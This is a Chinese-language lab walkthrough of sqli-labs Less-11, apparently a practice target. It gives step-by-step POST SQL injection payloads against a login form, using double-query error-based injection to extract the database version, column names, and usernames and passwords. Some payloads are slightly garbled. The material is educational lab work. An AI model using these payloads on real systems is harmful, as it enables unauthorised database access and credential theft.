靶场http://10.4.7.121:83/Less-11/
    image.png
    抓包
    image.png
    判断注入类型
    uname=admin’”&passwd=password&submit=Submitimage.png
    发现双引号被包裹起来了,判断它是一个单引号注入
    使它不报错
    image.png
    判断字段
    uname=admin’ order by 10%23&passwd=password&submit=Submit
    image.png
    发现他是两列
    image.png
    去爆破信息时只要它前面条件成立发现它我们并不能用联合查询查到
    image.png

    当我们用双注入就可以查寻到
    比如我现在查当前数据库
    uname=admin’ union select 1,count(1) from information_schema.tables group by floor(rand()*2) %23&passwd=1&submit=Submit
    image.png
    报错了这个值不能成为主键,这儿我们就可用concat拼接字符串来爆破我们需要的信息
    但这个就是查询到的东西是随机的

    uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()2),version()) %23&passwd=1&submit=Submit
    image.png
    查询版本号
    image.png
    查询数据库,这里要用limit过滤,不然数据太多可能不会报错
    image.png
    查询当前数据库当前表字段
    uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()    2),(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 1,1)) %23&passwd=1&submit=Submit
    image.pngimage.png
    查询账号密码
    uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()2),(select username from security.users limit 0,1)) %23&passwd=1&submit=Submit
    image.png
    uname=admin’ union select 1,count(1) from information_schema.tables group by concat(floor(rand()    2),(select password from security.users limit 0,1)) %23&passwd=1&submit=Submit
    image.png